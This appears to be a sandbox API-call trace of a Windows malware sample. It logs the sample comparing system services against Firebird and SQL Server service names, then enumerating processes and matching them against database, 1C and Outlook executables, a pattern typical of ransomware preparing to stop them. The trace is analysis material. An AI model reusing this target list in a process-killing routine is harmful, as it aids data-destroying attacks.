	[0165.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0165.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0165.534] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0165.534] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0165.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0165.534] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0165.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0165.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0165.534] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0165.534] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0165.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0165.534] lstrlenW (lpString="lmhosts") returned 7
	[0165.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0165.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0165.534] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0165.534] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0165.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0165.534] lstrlenW (lpString="MMCSS") returned 5
	[0165.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0165.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0165.535] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0165.535] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0165.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0165.535] lstrlenW (lpString="MpsSvc") returned 6
	[0165.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0165.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0165.535] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0165.535] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0165.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0165.535] lstrlenW (lpString="Netman") returned 6
	[0165.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0165.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0165.535] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0165.535] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0165.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0165.535] lstrlenW (lpString="netprofm") returned 8
	[0165.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0165.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0165.535] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0165.535] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0165.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0165.535] lstrlenW (lpString="NlaSvc") returned 6
	[0165.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0165.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0165.535] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0165.535] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0165.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0165.535] lstrlenW (lpString="nsi") returned 3
	[0165.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0165.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0165.535] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0165.535] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0165.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0165.536] lstrlenW (lpString="PcaSvc") returned 6
	[0165.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0165.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0165.536] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0165.536] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0165.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0165.536] lstrlenW (lpString="PlugPlay") returned 8
	[0165.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0165.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0165.536] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0165.536] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0165.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0165.536] lstrlenW (lpString="Power") returned 5
	[0165.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0165.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0165.536] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0165.536] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0165.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0165.536] lstrlenW (lpString="ProfSvc") returned 7
	[0165.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0165.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0165.536] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0165.536] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0165.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0165.536] lstrlenW (lpString="RpcEptMapper") returned 12
	[0165.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0165.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0165.536] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0165.536] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0165.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0165.536] lstrlenW (lpString="RpcSs") returned 5
	[0165.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0165.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0165.537] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0165.537] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0165.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0165.537] lstrlenW (lpString="SamSs") returned 5
	[0165.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0165.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0165.537] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0165.537] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0165.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0165.537] lstrlenW (lpString="Schedule") returned 8
	[0165.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0165.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0165.537] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0165.537] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0165.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0165.537] lstrlenW (lpString="SENS") returned 4
	[0165.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0165.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0165.537] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0165.537] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0165.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0165.537] lstrlenW (lpString="ShellHWDetection") returned 16
	[0165.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0165.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0165.537] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0165.537] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0165.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0165.537] lstrlenW (lpString="Spooler") returned 7
	[0165.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0165.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0165.537] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0165.537] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0165.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0165.538] lstrlenW (lpString="SysMain") returned 7
	[0165.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0165.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0165.538] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0165.538] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0165.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0165.538] lstrlenW (lpString="Themes") returned 6
	[0165.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0165.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0165.538] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0165.538] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0165.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0165.538] lstrlenW (lpString="TrkWks") returned 6
	[0165.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0165.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0165.538] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0165.538] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0165.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0165.538] lstrlenW (lpString="UxSms") returned 5
	[0165.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0165.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0165.538] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0165.538] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0165.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0165.538] lstrlenW (lpString="WdiServiceHost") returned 14
	[0165.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0165.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0165.538] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0165.538] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0165.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0165.538] lstrlenW (lpString="WdiSystemHost") returned 13
	[0165.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0165.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0165.539] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0165.539] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0165.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0165.539] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0165.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0165.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0165.539] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0165.539] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0165.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0165.539] lstrlenW (lpString="Winmgmt") returned 7
	[0165.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0165.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0165.539] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0165.539] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0165.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0165.539] lstrlenW (lpString="WPDBusEnum") returned 10
	[0165.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0165.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0165.539] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0165.540] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0165.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0165.540] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7ba6360 | out: hHeap=0x7ab0000) returned 1
	[0165.540] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3e8
	[0165.542] Process32FirstW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0165.542] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0165.542] lstrlenW (lpString="System") returned 6
	[0165.542] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0165.542] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0165.542] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0165.542] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0165.542] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0165.542] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0165.542] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0165.542] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0165.543] lstrlenW (lpString="smss.exe") returned 8
	[0165.543] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0165.543] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0165.543] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0165.543] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0165.543] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0165.543] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0165.543] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0165.543] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0165.543] lstrlenW (lpString="csrss.exe") returned 9
	[0165.543] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0165.543] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0165.543] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0165.543] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0165.543] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0165.543] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0165.543] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0165.543] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0165.544] lstrlenW (lpString="wininit.exe") returned 11
	[0165.544] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0165.544] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0165.544] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0165.544] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0165.544] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0165.544] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0165.544] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0165.544] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0165.544] lstrlenW (lpString="csrss.exe") returned 9
	[0165.544] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0165.544] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0165.544] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0165.544] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0165.544] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0165.544] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0165.545] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0165.545] lstrlenW (lpString="winlogon.exe") returned 12
	[0165.545] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0165.545] lstrlenW (lpString="services.exe") returned 12
	[0165.545] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0165.545] lstrlenW (lpString="lsass.exe") returned 9
	[0165.545] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0165.546] lstrlenW (lpString="lsm.exe") returned 7
	[0165.546] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0165.546] lstrlenW (lpString="svchost.exe") returned 11
	[0165.546] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0165.547] lstrlenW (lpString="svchost.exe") returned 11
	[0165.547] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0165.547] lstrlenW (lpString="svchost.exe") returned 11
	[0165.547] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0165.547] lstrlenW (lpString="svchost.exe") returned 11
	[0165.547] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0165.548] lstrlenW (lpString="svchost.exe") returned 11
	[0165.548] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0165.548] lstrlenW (lpString="audiodg.exe") returned 11
	[0165.548] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0165.548] lstrlenW (lpString="svchost.exe") returned 11
	[0165.548] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0165.548] lstrlenW (lpString="svchost.exe") returned 11
	[0165.548] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0165.549] lstrlenW (lpString="spoolsv.exe") returned 11
	[0165.549] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0165.549] lstrlenW (lpString="svchost.exe") returned 11
	[0165.549] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0165.549] lstrlenW (lpString="taskhost.exe") returned 12
	[0165.549] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0165.550] lstrlenW (lpString="userinit.exe") returned 12
	[0165.550] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0165.550] lstrlenW (lpString="dwm.exe") returned 7
	[0165.550] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0165.550] lstrlenW (lpString="explorer.exe") returned 12
	[0165.550] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0165.551] lstrlenW (lpString="gjfkyfli;.exe") returned 13
